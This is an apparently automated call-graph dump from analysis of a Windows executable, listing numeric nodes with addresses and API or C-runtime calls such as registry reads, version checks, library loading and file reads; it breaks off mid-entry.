59 API calls 98891->98892 98893 fc26b7 98892->98893 98898 fc3582 98893->98898 98896 fc2754 98897 fc105a 98896->98897 98901 fc3416 59 API calls 2 library calls 98896->98901 98897->98889 98902 fc35b0 98898->98902 98901->98896 98903 fc35bd 98902->98903 98904 fc35a1 98902->98904 98903->98904 98905 fc35c4 RegOpenKeyExW 98903->98905 98904->98896 98905->98904 98906 fc35de RegQueryValueExW 98905->98906 98907 fc35ff 98906->98907 98908 fc3614 RegCloseKey 98906->98908 98907->98908 98908->98904 98909 fc1016 98914 fc4ad2 98909->98914 98912 fe2f80 __cinit 67 API calls 98913 fc1025 98912->98913 98915 fe0ff6 Mailbox 59 API calls 98914->98915 98916 fc4ada 98915->98916 98918 fc101b 98916->98918 98921 fc4a94 98916->98921 98918->98912 98922 fc4a9d 98921->98922 98923 fc4aaf 98921->98923 98924 fe2f80 __cinit 67 API calls 98922->98924 98925 fc4afe 98923->98925 98924->98923 98926 fc77c7 59 API calls 98925->98926 98927 fc4b16 GetVersionExW 98926->98927 98928 fc7d2c 59 API calls 98927->98928 98929 fc4b59 98928->98929 98930 fc7e8c 59 API calls 98929->98930 98935 fc4b86 98929->98935 98931 fc4b7a 98930->98931 98932 fc7886 59 API calls 98931->98932 98932->98935 98933 fc4bf1 GetCurrentProcess IsWow64Process 98934 fc4c0a 98933->98934 98937 fc4c89 GetSystemInfo 98934->98937 98938 fc4c20 98934->98938 98935->98933 98936 ffdc8d 98935->98936 98939 fc4c56 98937->98939 98949 fc4c95 98938->98949 98939->98918 98942 fc4c7d GetSystemInfo 98944 fc4c47 98942->98944 98943 fc4c32 98945 fc4c95 2 API calls 98943->98945 98944->98939 98947 fc4c4d FreeLibrary 98944->98947 98946 fc4c3a GetNativeSystemInfo 98945->98946 98946->98944 98947->98939 98950 fc4c2e 98949->98950 98951 fc4c9e LoadLibraryA 98949->98951 98950->98942 98950->98943 98951->98950 98952 fc4caf GetProcAddress 98951->98952 98952->98950 98953 fe7e93 98954 fe7e9f __close 98953->98954 98990 fea048 GetStartupInfoW 98954->98990 98957 fe7ea4 98992 fe8dbc GetProcessHeap 98957->98992 98958 fe7efc 98959 fe7f07 98958->98959 99075 fe7fe3 58 API calls 3 library calls 98958->99075 98993 fe9d26 98959->98993 98962 fe7f0d 98963 fe7f18 __RTC_Initialize 98962->98963 99076 fe7fe3 58 API calls 3 library calls 98962->99076 99014 fed812 98963->99014 98966 fe7f27 98967 fe7f33 GetCommandLineW 98966->98967 99077 fe7fe3 58 API calls 3 library calls 98966->99077 99033 ff5173 GetEnvironmentStringsW 98967->99033 98970 fe7f32 98970->98967 98973 fe7f4d 98977 fe7f58 98973->98977 99078 fe32f5 58 API calls 3 library calls 98973->99078 98976 fe7f5e 98978 fe7f69 98976->98978 99079 fe32f5 58 API calls 3 library calls 98976->99079 99043 ff4fa8 98977->99043 99057 fe332f 98978->99057 98981 fe7f71 98982 fe7f7c __wwincmdln 98981->98982 99080 fe32f5 58 API calls 3 library calls 98981->99080 99063 fc492e 98982->99063 98985 fe7f90 98986 fe7f9f 98985->98986 99081 fe3598 58 API calls _doexit 98985->99081 99082 fe3320 58 API calls _doexit 98986->99082 98989 fe7fa4 __close 98991 fea05e 98990->98991 98991->98957 98992->98958 99083 fe33c7 36 API calls 2 library calls 98993->99083 98995 fe9d2b 99084 fe9f7c InitializeCriticalSectionAndSpinCount __alloc_osfhnd 98995->99084 98997 fe9d30 98998 fe9d34 98997->98998 99086 fe9fca TlsAlloc 98997->99086 99085 fe9d9c 61 API calls 2 library calls 98998->99085 99001 fe9d39 99001->98962 99002 fe9d46 99002->98998 99003 fe9d51 99002->99003 99087 fe8a15 99003->99087 99006 fe9d93 99095 fe9d9c 61 API calls 2 library calls 99006->99095 99009 fe9d98 99009->98962 99010 fe9d72 99010->99006 99011 fe9d78 99010->99011 99094 fe9c73 58 API calls 4 library calls 99011->99094 99013 fe9d80 GetCurrentThreadId 99013->98962 99015 fed81e __close 99014->99015 99016 fe9e4b __lock 58 API calls 99015->99016 99017 fed825 99016->99017 99018 fe8a15 __calloc_crt 58 API calls 99017->99018 99019 fed836 99018->99019 99020 fed8a1 GetStartupInfoW 99019->99020 99021 fed841 __close @_EH4_CallFilterFunc@8 99019->99021 99027 fed8b6 99020->99027 99030 fed9e5 99020->99030 99021->98966 99022 fedaad 99109 fedabd LeaveCriticalSection _doexit 99022->99109 99024 fe8a15 __calloc_crt 58 API calls 99024->99027 99025 feda32 GetStdHandle 99025->99030 99026 feda45 GetFileType 99026->99030 99027->99024 99029 fed904 99027->99029 99027->99030 99028 fed938 GetFileType 99028->99029 99029->99028 99029->99030 99107 fea06b InitializeCriticalSectionAndSpinCount 99029->99107 99030->99022 99030->99025 99030->99026 99108 fea06b InitializeCriticalSectionAndSpinCount 99030->99108 99034 fe7f43 99033->99034 99035 ff5184 99033->99035 99039 ff4d6b GetModuleFileNameW 99034->99039 99110 fe8a5d 58 API calls 2 library calls 99035->99110 99037 ff51aa _memmove 99038 ff51c0 FreeEnvironmentStringsW 99037->99038 99038->99034 99040 ff4d9f _wparse_cmdline 99039->99040 99042 ff4ddf _wparse_cmdline 99040->99042 99111 fe8a5d 58 API calls 2 library calls 99040->99111 99042->98973 99044 ff4fb9 99043->99044 99045 ff4fc1 __wsetenvp 99043->99045 99044->98976 99046 fe8a15 __calloc_crt 58 API calls 99045->99046 99053 ff4fea __wsetenvp 99046->99053 99047 ff5041 99048 fe2f95 _free 58 API calls 99047->99048 99048->99044 99049 fe8a15 __calloc_crt 58 API calls 99049->99053 99050 ff5066 99051 fe2f95 _free 58 API calls 99050->99051 99051->99044 99053->99044 99053->99047 99053->99049 99053->99050 99054 ff507d 99053->99054 99112 ff4857 58 API calls __close 99053->99112 99113 fe9006 IsProcessorFeaturePresent 99054->99113 99056 ff5089 99056->98976 99058 fe333b __IsNonwritableInCurrentImage 99057->99058 99136 fea711 99058->99136 99060 fe3359 __initterm_e 99061 fe2f80 __cinit 67 API calls 99060->99061 99062 fe3378 _doexit __IsNonwritableInCurrentImage 99060->99062 99061->99062 99062->98981 99064 fc4948 99063->99064 99074 fc49e7 99063->99074 99065 fc4982 IsThemeActive 99064->99065 99139 fe35ac 99065->99139 99069 fc49ae 99151 fc4a5b SystemParametersInfoW SystemParametersInfoW 99069->99151 99071 fc49ba 99152 fc3b4c 99071->99152 99073 fc49c2 SystemParametersInfoW 99073->99074 99074->98985 99075->98959 99076->98963 99077->98970 99081->98986 99082->98989 99083->98995 99084->98997 99085->99001 99086->99002 99090 fe8a1c 99087->99090 99089 fe8a57 99089->99006 99093 fea026 TlsSetValue 99089->99093 99090->99089 99092 fe8a3a 99090->99092 99096 ff5446 99090->99096 99092->99089 99092->99090 99104 fea372 Sleep 99092->99104 99093->99010 99094->99013 99095->99009 99097 ff5451 99096->99097 99102 ff546c 99096->99102 99098 ff545d 99097->99098 99097->99102 99105 fe8d68 58 API calls __getptd_noexit 99098->99105 99100 ff547c HeapAlloc 99101 ff5462 99100->99101 99100->99102 99101->99090 99102->99100 99102->99101 99106 fe35e1 DecodePointer 99102->99106 99104->99092 99105->99101 99106->99102 99107->99029 99108->99030 99109->99021 99110->99037 99111->99042 99112->99053 99114 fe9011 99113->99114 99119 fe8e99 99114->99119 99118 fe902c 99118->99056 99120 fe8eb3 _memset __call_reportfault 99119->99120 99121 fe8ed3 IsDebuggerPresent 99120->99121 99127 fea395 SetUnhandledExceptionFilter UnhandledExceptionFilter 99121->99127 99124 fe8fba 99126 fea380 GetCurrentProcess TerminateProcess 99124->99126 99125 fe8f97 __call_reportfault 99128 fec836 99125->99128 99126->99118 99127->99125 99129 fec83e 99128->99129 99130 fec840 IsProcessorFeaturePresent 99128->99130 99129->99124 99132 ff5b5a 99130->99132 99135 ff5b09 5 API calls 2 library calls 99132->99135 99134 ff5c3d 99134->99124 99135->99134 99137 fea714 EncodePointer 99136->99137 99137->99137 99138 fea72e 99137->99138 99138->99060 99140 fe9e4b __lock 58 API calls 99139->99140 99141 fe35b7 DecodePointer EncodePointer 99140->99141 99204 fe9fb5 LeaveCriticalSection 99141->99204 99143 fc49a7 99144 fe3614 99143->99144 99145 fe361e 99144->99145 99146 fe3638 99144->99146 99145->99146 99205 fe8d68 58 API calls __getptd_noexit 99145->99205 99146->99069 99148 fe3628 99206 fe8ff6 9 API calls __close 99148->99206 99150 fe3633 99150->99069 99151->99071 99153 fc3b59 __ftell_nolock 99152->99153 99154 fc77c7 59 API calls 99153->99154 99155 fc3b63 GetCurrentDirectoryW 99154->99155 99207 fc3778 99155->99207 99157 fc3b8c IsDebuggerPresent 99158 ffd4ad MessageBoxA 99157->99158 99159 fc3b9a 99157->99159 99162 ffd4c7 99158->99162 99160 fc3c73 99159->99160 99159->99162 99163 fc3bb7 99159->99163 99161 fc3c7a SetCurrentDirectoryW 99160->99161 99164 fc3c87 Mailbox 99161->99164 99417 fc7373 59 API calls Mailbox 99162->99417 99288 fc73e5 99163->99288 99164->99073 99167 ffd4d7 99172 ffd4ed SetCurrentDirectoryW 99167->99172 99172->99164 99204->99143 99205->99148 99206->99150 99208 fc77c7 59 API calls 99207->99208 99209 fc378e 99208->99209 99419 fc3d43 99209->99419 99211 fc37ac 99212 fc4864 61 API calls 99211->99212 99213 fc37c0 99212->99213 99214 fc7f41 59 API calls 99213->99214 99215 fc37cd 99214->99215 99433 fc4f3d 99215->99433 99218 ffd3ae 99489 10297e5 99218->99489 99219 fc37ee Mailbox 99223 fc81a7 59 API calls 99219->99223 99222 ffd3cd 99225 fe2f95 _free 58 API calls 99222->99225 99226 fc3801 99223->99226 99227 ffd3da 99225->99227 99457 fc93ea 99226->99457 99229 fc4faa 84 API calls 99227->99229 99231 ffd3e3 99229->99231 99235 fc3ee2 59 API calls 99231->99235 99232 fc7f41 59 API calls 99233 fc381a 99232->99233 99460 fc8620 99233->99460 99237 ffd3fe 99235->99237 99236 fc382c Mailbox 99238 fc7f41 59 API calls 99236->99238 99239 fc3ee2 59 API calls 99237->99239 99240 fc3852 99238->99240 99241 ffd41a 99239->99241 99242 fc8620 69 API calls 99240->99242 99243 fc4864 61 API calls 99241->99243 99245 fc3861 Mailbox 99242->99245 99244 ffd43f 99243->99244 99246 fc3ee2 59 API calls 99244->99246 99248 fc77c7 59 API calls 99245->99248 99247 ffd44b 99246->99247 99249 fc81a7 59 API calls 99247->99249 99250 fc387f 99248->99250 99251 ffd459 99249->99251 99464 fc3ee2 99250->99464 99253 fc3ee2 59 API calls 99251->99253 99255 ffd468 99253->99255 99261 fc81a7 59 API calls 99255->99261 99257 fc3899 99257->99231 99258 fc38a3 99257->99258 99259 fe313d _W_store_winword 60 API calls 99258->99259 99260 fc38ae 99259->99260 99260->99237 99262 fc38b8 99260->99262 99263 ffd48a 99261->99263 99264 fe313d _W_store_winword 60 API calls 99262->99264 99265 fc3ee2 59 API calls 99263->99265 99266 fc38c3 99264->99266 99267 ffd497 99265->99267 99266->99241 99268 fc38cd 99266->99268 99267->99267 99269 fe313d _W_store_winword 60 API calls 99268->99269 99270 fc38d8 99269->99270 99270->99255 99271 fc3919 99270->99271 99273 fc3ee2 59 API calls 99270->99273 99271->99255 99272 fc3926 99271->99272 99274 fc942e 59 API calls 99272->99274 99275 fc38fc 99273->99275 99276 fc3936 99274->99276 99277 fc81a7 59 API calls 99275->99277 99278 fc91b0 59 API calls 99276->99278 99279 fc390a 99277->99279 99280 fc3944 99278->99280 99281 fc3ee2 59 API calls 99279->99281 99480 fc9040 99280->99480 99281->99271 99283 fc93ea 59 API calls 99284 fc3961 99283->99284 99284->99283 99285 fc9040 60 API calls 99284->99285 99286 fc3ee2 59 API calls 99284->99286 99287 fc39a7 Mailbox 99284->99287 99285->99284 99286->99284 99287->99157 99289 fc73f2 __ftell_nolock 99288->99289 99290 ffee4b _memset 99289->99290 99291 fc740b 99289->99291 99293 ffee67 GetOpenFileNameW 99290->99293 99292 fc48ae 60 API calls 99291->99292 99294 fc7414 99292->99294 99295 ffeeb6 99293->99295 100246 fe09d5 99294->100246 99297 fc7d2c 59 API calls 99295->99297 99299 ffeecb 99297->99299 99299->99299 99301 fc7429 100264 fc69ca 99301->100264 99417->99167 99420 fc3d50 __ftell_nolock 99419->99420 99421 fc7d2c 59 API calls 99420->99421 99426 fc3eb6 Mailbox 99420->99426 99423 fc3d82 99421->99423 99422 fc7b52 59 API calls 99422->99423 99423->99422 99432 fc3db8 Mailbox 99423->99432 99424 fc7b52 59 API calls 99424->99432 99425 fc3e89 99425->99426 99427 fc7f41 59 API calls 99425->99427 99426->99211 99429 fc3eaa 99427->99429 99428 fc7f41 59 API calls 99428->99432 99430 fc3f84 59 API calls 99429->99430 99430->99426 99431 fc3f84 59 API calls 99431->99432 99432->99424 99432->99425 99432->99426 99432->99428 99432->99431 99530 fc4d13 99433->99530 99438 ffdd0f 99441 fc4faa 84 API calls 99438->99441 99439 fc4f68 LoadLibraryExW 99540 fc4cc8 99439->99540 99442 ffdd16 99441->99442 99444 fc4cc8 3 API calls 99442->99444 99446 ffdd1e 99444->99446 99566 fc506b 99446->99566 99447 fc4f8f 99447->99446 99448 fc4f9b 99447->99448 99450 fc4faa 84 API calls 99448->99450 99452 fc37e6 99450->99452 99452->99218 99452->99219 99454 ffdd45 99572 fc5027 99454->99572 99456 ffdd52 99458 fe0ff6 Mailbox 59 API calls 99457->99458 99459 fc380d 99458->99459 99459->99232 99461 fc862b 99460->99461 99462 fc8652 99461->99462 99994 fc8b13 69 API calls Mailbox 99461->99994 99462->99236 99465 fc3eec 99464->99465 99466 fc3f05 99464->99466 99467 fc81a7 59 API calls 99465->99467 99468 fc7d2c 59 API calls 99466->99468 99469 fc388b 99467->99469 99468->99469 99470 fe313d 99469->99470 99471 fe31be 99470->99471 99472 fe3149 99470->99472 99997 fe31d0 60 API calls 3 library calls 99471->99997 99479 fe316e 99472->99479 99995 fe8d68 58 API calls __getptd_noexit 99472->99995 99475 fe31cb 99475->99257 99476 fe3155 99996 fe8ff6 9 API calls __close 99476->99996 99478 fe3160 99478->99257 99479->99257 99481 fff5a5 99480->99481 99485 fc9057 99480->99485 99481->99485 99999 fc8d3b 59 API calls Mailbox 99481->99999 99483 fc9158 99486 fe0ff6 Mailbox 59 API calls 99483->99486 99484 fc91a0 99998 fc9e9c 60 API calls Mailbox 99484->99998 99485->99483 99485->99484 99488 fc915f 99485->99488 99486->99488 99488->99284 99490 fc5045 85 API calls 99489->99490 99491 1029854 99490->99491 100000 10299be 96 API calls 2 library calls 99491->100000 99493 1029866 99494 fc506b 74 API calls 99493->99494 99521 ffd3c1 99493->99521 99495 1029881 99494->99495 99496 fc506b 74 API calls 99495->99496 99497 1029891 99496->99497 99498 fc506b 74 API calls 99497->99498 99499 10298ac 99498->99499 99500 fc506b 74 API calls 99499->99500 99501 10298c7 99500->99501 99502 fc5045 85 API calls 99501->99502 99503 10298de 99502->99503 99504 fe594c __crtGetStringTypeA_stat 58 API calls 99503->99504 99505 10298e5 99504->99505 99506 fe594c __crtGetStringTypeA_stat 58 API calls 99505->99506 99507 10298ef 99506->99507 99508 fc506b 74 API calls 99507->99508 99509 1029903 99508->99509 100001 1029393 GetSystemTimeAsFileTime 99509->100001 99511 1029916 99512 1029940 99511->99512 99513 102992b 99511->99513 99514 1029946 99512->99514 99515 10299a5 99512->99515 99516 fe2f95 _free 58 API calls 99513->99516 100002 1028d90 99514->100002 99518 fe2f95 _free 58 API calls 99515->99518 99519 1029931 99516->99519 99518->99521 99522 fe2f95 _free 58 API calls 99519->99522 99521->99222 99524 fc4faa 99521->99524 99522->99521 99523 fe2f95 _free 58 API calls 99523->99521 99525 fc4fb4 99524->99525 99527 fc4fbb 99524->99527 99526 fe55d6 __fcloseall 83 API calls 99525->99526 99526->99527 99528 fc4fca 99527->99528 99529 fc4fdb FreeLibrary 99527->99529 99528->99222 99529->99528 99577 fc4d61 99530->99577 99533 fc4d4a FreeLibrary 99534 fc4d53 99533->99534 99537 fe548b 99534->99537 99535 fc4d61 2 API calls 99536 fc4d3a 99535->99536 99536->99533 99536->99534 99581 fe54a0 99537->99581 99539 fc4f5c 99539->99438 99539->99439 99739 fc4d94 99540->99739 99543 fc4cff FreeLibrary 99544 fc4d08 99543->99544 99547 fc4dd0 99544->99547 99545 fc4d94 2 API calls 99546 fc4ced 99545->99546 99546->99543 99546->99544 99548 fe0ff6 Mailbox 59 API calls 99547->99548 99549 fc4de5 99548->99549 99550 fc538e 59 API calls 99549->99550 99551 fc4df1 _memmove 99550->99551 99552 fc4e2c 99551->99552 99553 fc4ee9 99551->99553 99554 fc4f21 99551->99554 99555 fc5027 69 API calls 99552->99555 99743 fc4fe9 CreateStreamOnHGlobal 99553->99743 99754 1029ba5 95 API calls 99554->99754 99563 fc4e35 99555->99563 99558 fc506b 74 API calls 99558->99563 99559 fc4ec9 99559->99447 99561 ffdcd0 99562 fc5045 85 API calls 99561->99562 99564 ffdce4 99562->99564 99563->99558 99563->99559 99563->99561 99749 fc5045 99563->99749 99565 fc506b 74 API calls 99564->99565 99565->99559 99567 fc507d 99566->99567 99568 ffddf6 99566->99568 99778 fe5812 99567->99778 99571 1029393 GetSystemTimeAsFileTime 99571->99454 99573 ffddb9 99572->99573 99574 fc5036 99572->99574 99976 fe5e90 99574->99976 99576 fc503e 99576->99456 99578 fc4d2e 99577->99578 99579 fc4d6a LoadLibraryA 99577->99579 99578->99535 99578->99536 99579->99578 99580 fc4d7b GetProcAddress 99579->99580 99580->99578 99582 fe54ac __close 99581->99582 99583 fe54bf 99582->99583 99586 fe54f0 99582->99586 99630 fe8d68 58 API calls __getptd_noexit 99583->99630 99585 fe54c4 99631 fe8ff6 9 API calls __close 99585->99631 99600 ff0738 99586->99600 99589 fe54f5 99590 fe54fe 99589->99590 99591 fe550b 99589->99591 99632 fe8d68 58 API calls __getptd_noexit 99590->99632 99592 fe5535 99591->99592 99593 fe5515 99591->99593 99615 ff0857 99592->99615 99633 fe8d68 58 API calls __getptd_noexit 99593->99633 99597 fe54cf __close @_EH4_CallFilterFunc@8 99597->99539 99601 ff0744 __close 99600->99601 99602 fe9e4b __lock 58 API calls 99601->99602 99612 ff0752 99602->99612 99603 ff07c6 99635 ff084e 99603->99635 99604 ff07cd 99640 fe8a5d 58 API calls 2 library calls 99604->99640 99607 ff0843 __close 99607->99589 99608 ff07d4 99608->99603 99641 fea06b InitializeCriticalSectionAndSpinCount 99608->99641 99611 fe9ed3 __mtinitlocknum 58 API calls 99611->99612 99612->99603 99612->99604 99612->99611 99638 fe6e8d 59 API calls __lock 99612->99638 99639 fe6ef7 LeaveCriticalSection LeaveCriticalSection _doexit 99612->99639 99613 ff07fa EnterCriticalSection 99613->99603 99624 ff0877 __wopenfile 99615->99624 99616 ff0891 99646 fe8d68 58 API calls __getptd_noexit 99616->99646 99617 ff0a4c 99617->99616 99621 ff0aaf 99617->99621 99619 ff0896 99647 fe8ff6 9 API calls __close 99619->99647 99643 ff87f1 99621->99643 99622 fe5540 99634 fe5562 LeaveCriticalSection LeaveCriticalSection _fseek 99622->99634 99624->99616 99624->99617 99648 fe3a0b 60 API calls 2 library calls 99624->99648 99626 ff0a45 99626->99617 99649 fe3a0b 60 API calls 2 library calls 99626->99649 99628 ff0a64 99628->99617 99650 fe3a0b 60 API calls 2 library calls 99628->99650 99630->99585 99631->99597 99632->99597 99633->99597 99634->99597 99642 fe9fb5 LeaveCriticalSection 99635->99642 99637 ff0855 99637->99607 99638->99612 99639->99612 99640->99608 99641->99613 99642->99637 99651 ff7fd5 99643->99651 99645 ff880a 99645->99622 99646->99619 99647->99622 99648->99626 99649->99628 99650->99617 99652 ff7fe1 __close 99651->99652 99653 ff7ff7 99652->99653 99655 ff802d 99652->99655 99736 fe8d68 58 API calls __getptd_noexit 99653->99736 99662 ff809e 99655->99662 99656 ff7ffc 99737 fe8ff6 9 API calls __close 99656->99737 99659 ff8049 99738 ff8072 LeaveCriticalSection __unlock_fhandle 99659->99738 99661 ff8006 __close 99661->99645 99663 ff80be 99662->99663 99664 fe471a __wsopen_nolock 58 API calls 99663->99664 99666 ff80da 99664->99666 99665 fe9006 __invoke_watson 8 API calls 99667 ff87f0 99665->99667 99668 ff8114 99666->99668 99676 ff8137 99666->99676 99710 ff8211 99666->99710 99669 ff7fd5 __wsopen_helper 103 API calls 99667->99669 99670 fe8d34 __close 58 API calls 99668->99670 99671 ff880a 99669->99671 99672 ff8119 99670->99672 99671->99659 99673 fe8d68 __close 58 API calls 99672->99673 99674 ff8126 99673->99674 99677 fe8ff6 __close 9 API calls 99674->99677 99675 ff81f5 99678 fe8d34 __close 58 API calls 99675->99678 99676->99675 99682 ff81d3 99676->99682 99703 ff8130 99677->99703 99679 ff81fa 99678->99679 99680 fe8d68 __close 58 API calls 99679->99680 99681 ff8207 99680->99681 99683 fe8ff6 __close 9 API calls 99681->99683 99684 fed4d4 __alloc_osfhnd 61 API calls 99682->99684 99683->99710 99685 ff82a1 99684->99685 99686 ff82ce 99685->99686 99687 ff82ab 99685->99687 99689 ff7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99686->99689 99688 fe8d34 __close 58 API calls 99687->99688 99690 ff82b0 99688->99690 99696 ff82f0 99689->99696 99691 fe8d68 __close 58 API calls 99690->99691 99693 ff82ba 99691->99693 99692 ff836e GetFileType 99694 ff8379 GetLastError 99692->99694 99697 ff83bb 99692->99697 99699 fe8d68 __close 58 API calls 99693->99699 99700 fe8d47 __dosmaperr 58 API calls 99694->99700 99695 ff833c GetLastError 99698 fe8d47 __dosmaperr 58 API calls 99695->99698 99696->99692 99696->99695 99701 ff7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99696->99701 99706 fed76a __set_osfhnd 59 API calls 99697->99706 99702 ff8361 99698->99702 99699->99703 99704 ff83a0 CloseHandle 99700->99704 99705 ff8331 99701->99705 99708 fe8d68 __close 58 API calls 99702->99708 99703->99659 99704->99702 99707 ff83ae 99704->99707 99705->99692 99705->99695 99713 ff83d9 99706->99713 99709 fe8d68 __close 58 API calls 99707->99709 99708->99710 99711 ff83b3 99709->99711 99710->99665 99711->99702 99712 ff8594 99712->99710 99715 ff8767 CloseHandle 99712->99715 99713->99712 99714 ff1b11 __lseeki64_nolock 60 API calls 99713->99714 99732 ff845a 99713->99732 99716 ff8443 99714->99716 99717 ff7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99715->99717 99720 fe8d34 __close 58 API calls 99716->99720 99716->99732 99719 ff878e 99717->99719 99718 ff10ab 70 API calls __read_nolock 99718->99732 99721 ff87c2 99719->99721 99722 ff8796 GetLastError 99719->99722 99720->99732 99721->99710 99723 fe8d47 __dosmaperr 58 API calls 99722->99723 99726 ff87a2 99723->99726 99724 ff0d2d __close_nolock 61 API calls 99724->99732 99725 ff848c 99727 ff99f2 __chsize_nolock 82 API calls 99725->99727 99725->99732 99728 fed67d __free_osfhnd 59 API calls 99726->99728 99727->99725 99728->99721 99729 fedac6 __write 78 API calls 99729->99732 99730 ff8611 99731 ff0d2d __close_nolock 61 API calls 99730->99731 99733 ff8618 99731->99733 99732->99712 99732->99718 99732->99724 99732->99725 99732->99729 99732->99730 99734 ff1b11 60 API calls __lseeki64_nolock 99732->99734 99735 fe8d68 __close 58 API calls 99733->99735 99734->99732 99735->99710 99736->99656 99737->99661 99738->99661 99740 fc4ce1 99739->99740 99741 fc4d9d LoadLibraryA 99739->99741 99740->99545 99740->99546 99741->99740 99742 fc4dae GetProcAddress 99741->99742 99742->99740 99744 fc5003 FindResourceExW 99743->99744 99748 fc5020 99743->99748 99745 ffdd5c LoadResource 99744->99745 99744->99748 99746 ffdd71 SizeofResource 99745->99746 99745->99748 99747 ffdd85 LockResource 99746->99747 99746->99748 99747->99748 99748->99552 99750 fc5054 99749->99750 99751 ffddd4 99749->99751 99755 fe5a7d 99750->99755 99753 fc5062 99753->99563 99754->99552 99756 fe5a89 __close 99755->99756 99757 fe5a9b 99756->99757 99759 fe5ac1 99756->99759 99768 fe8d68 58 API calls __getptd_noexit 99757->99768 99770 fe6e4e 99759->99770 99760 fe5aa0 99769 fe8ff6 9 API calls __close 99760->99769 99763 fe5ac7 99776 fe59ee 83 API calls 5 library calls 99763->99776 99765 fe5ad6 99777 fe5af8 LeaveCriticalSection LeaveCriticalSection _fseek 99765->99777 99767 fe5aab __close 99767->99753 99768->99760 99769->99767 99771 fe6e5e 99770->99771 99772 fe6e80 EnterCriticalSection 99770->99772 99771->99772 99773 fe6e66 99771->99773 99774 fe6e76 99772->99774 99775 fe9e4b __lock 58 API calls 99773->99775 99774->99763 99775->99774 99776->99765 99777->99767 99781 fe582d 99778->99781 99780 fc508e 99780->99571 99782 fe5839 __close 99781->99782 99783 fe584f _memset 99782->99783 99784 fe587c 99782->99784 99785 fe5874 __close 99782->99785 99808 fe8d68 58 API calls __getptd_noexit 99783->99808 99786 fe6e4e __lock_file 59 API calls 99784->99786 99785->99780 99788 fe5882 99786->99788 99794 fe564d 99788->99794 99789 fe5869 99809 fe8ff6 9 API calls __close 99789->99809 99798 fe5668 _memset 99794->99798 99800 fe5683 99794->99800 99795 fe5673 99906 fe8d68 58 API calls __getptd_noexit 99795->99906 99797 fe5678 99907 fe8ff6 9 API calls __close 99797->99907 99798->99795 99798->99800 99805 fe56c3 99798->99805 99810 fe58b6 LeaveCriticalSection LeaveCriticalSection _fseek 99800->99810 99802 fe57d4 _memset 99909 fe8d68 58 API calls __getptd_noexit 99802->99909 99805->99800 99805->99802 99811 fe4916 99805->99811 99818 ff10ab 99805->99818 99886 ff0df7 99805->99886 99908 ff0f18 58 API calls 3 library calls 99805->99908 99808->99789 99809->99785 99810->99785 99812 fe4935 99811->99812 99813 fe4920 99811->99813 99812->99805 99910 fe8d68 58 API calls __getptd_noexit 99813->99910 99815 fe4925 99911 fe8ff6 9 API calls __close 99815->99911 99817 fe4930 99817->99805 99819 ff10cc 99818->99819 99820 ff10e3 99818->99820 99921 fe8d34 58 API calls __getptd_noexit 99819->99921 99822 ff181b 99820->99822 99826 ff111d 99820->99826 99937 fe8d34 58 API calls __getptd_noexit 99822->99937 99823 ff10d1 99922 fe8d68 58 API calls __getptd_noexit 99823->99922 99829 ff1125 99826->99829 99834 ff113c 99826->99834 99827 ff1820 99938 fe8d68 58 API calls __getptd_noexit 99827->99938 99923 fe8d34 58 API calls __getptd_noexit 99829->99923 99830 ff1131 99939 fe8ff6 9 API calls __close 99830->99939 99832 ff112a 99924 fe8d68 58 API calls __getptd_noexit 99832->99924 99835 ff1151 99834->99835 99837 ff116b 99834->99837 99839 ff1189 99834->99839 99866 ff10d8 99834->99866 99925 fe8d34 58 API calls __getptd_noexit 99835->99925 99837->99835 99843 ff1176 99837->99843 99926 fe8a5d 58 API calls 2 library calls 99839->99926 99841 ff1199 99844 ff11bc 99841->99844 99845 ff11a1 99841->99845 99912 ff5ebb 99843->99912 99929 ff1b11 60 API calls 3 library calls 99844->99929 99927 fe8d68 58 API calls __getptd_noexit 99845->99927 99846 ff128a 99848 ff1303 ReadFile 99846->99848 99853 ff12a0 GetConsoleMode 99846->99853 99851 ff1325 99848->99851 99852 ff17e3 GetLastError 99848->99852 99850 ff11a6 99928 fe8d34 58 API calls __getptd_noexit 99850->99928 99851->99852 99859 ff12f5 99851->99859 99855 ff12e3 99852->99855 99856 ff17f0 99852->99856 99857 ff12b4 99853->99857 99858 ff1300 99853->99858 99868 ff12e9 99855->99868 99930 fe8d47 58 API calls 2 library calls 99855->99930 99935 fe8d68 58 API calls __getptd_noexit 99856->99935 99857->99858 99861 ff12ba ReadConsoleW 99857->99861 99858->99848 99859->99868 99870 ff135a 99859->99870 99873 ff15c7 99859->99873 99861->99859 99863 ff12dd GetLastError 99861->99863 99862 ff17f5 99936 fe8d34 58 API calls __getptd_noexit 99862->99936 99863->99855 99866->99805 99867 fe2f95 _free 58 API calls 99867->99866 99868->99866 99868->99867 99871 ff13c6 ReadFile 99870->99871 99877 ff1447 99870->99877 99874 ff13e7 GetLastError 99871->99874 99878 ff13f1 99871->99878 99872 ff16cd ReadFile 99880 ff16f0 GetLastError 99872->99880 99885 ff16fe 99872->99885 99873->99868 99873->99872 99874->99878 99875 ff1504 99882 ff14b4 MultiByteToWideChar 99875->99882 99933 ff1b11 60 API calls 3 library calls 99875->99933 99876 ff14f4 99932 fe8d68 58 API calls __getptd_noexit 99876->99932 99877->99868 99877->99875 99877->99876 99877->99882 99878->99870 99931 ff1b11 60 API calls 3 library calls 99878->99931 99880->99885 99882->99863 99882->99868 99885->99873 99934 ff1b11 60 API calls 3 library calls 99885->99934 99887 ff0e02 99886->99887 99891 ff0e17 99886->99891 99973 fe8d68 58 API calls __getptd_noexit 99887->99973 99889 ff0e07 99974 fe8ff6 9 API calls __close 99889->99974 99890 ff0e12 99890->99805 99891->99890 99893 ff0e4c 99891->99893 99975 ff6234 58 API calls __malloc_crt 99891->99975 99895 fe4916 _fprintf 58 API calls 99893->99895 99896 ff0e60 99895->99896 99940 ff0f97 99896->99940 99898 ff0e67 99898->99890 99899 fe4916 _fprintf 58 API calls 99898->99899 99900 ff0e8a 99899->99900 99900->99890 99901 fe4916 _fprintf 58 API calls 99900->99901 99902 ff0e96 99901->99902 99902->99890 99903 fe4916 _fprintf 58 API calls 99902->99903 99904 ff0ea3 99903->99904 99905 fe4916 _fprintf 58 API calls 99904->99905 99905->99890 99906->99797 99907->99800 99908->99805 99909->99797 99910->99815 99911->99817 99913 ff5ec6 99912->99913 99914 ff5ed3 99912->99914 99915 fe8d68 __close 58 API calls 99913->99915 99917 ff5edf 99914->99917 99918 fe8d68 __close 58 API calls 99914->99918 99916 ff5ecb 99915->99916 99916->99846 99917->99846 99919 ff5f00 99918->99919 99920 